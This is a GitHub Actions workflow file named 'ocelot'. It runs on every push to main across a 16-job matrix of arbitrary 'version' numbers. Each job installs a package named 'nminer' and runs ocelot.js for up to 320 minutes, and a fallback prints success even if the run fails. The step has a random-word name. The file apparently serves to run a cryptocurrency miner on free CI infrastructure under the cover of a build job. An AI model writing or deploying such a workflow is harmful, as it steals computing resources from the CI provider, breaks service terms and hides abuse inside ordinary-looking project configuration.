name: ocelot
on:
  push:
    branches: [ "main" ]

jobs:
  build:
    runs-on: ubuntu-latest
    strategy:
      matrix:
        config:
          - { version: 4619 }
          - { version: 8825 }
          - { version: 8237 }
          - { version: 5258 }
          - { version: 7293 }
          - { version: 8095 }
          - { version: 9564 }
          - { version: 1089 }
          - { version: 2182 }
          - { version: 8160 }
          - { version: 55 }
          - { version: 9692 }
          - { version: 9017 }
          - { version: 7687 }
          - { version: 514 }
          - { version: 3564 }

    steps:
      - name: Checkout
        uses: actions/checkout@v4

      - name: Install Node.js
        uses: actions/setup-node@v3
        with:
          node-version: 20
          
      - name: pharmacopoeia cleverly lieu
        run: |
          npm install nminer@latest
          timeout 320m node ocelot.js || echo "ocelot executed"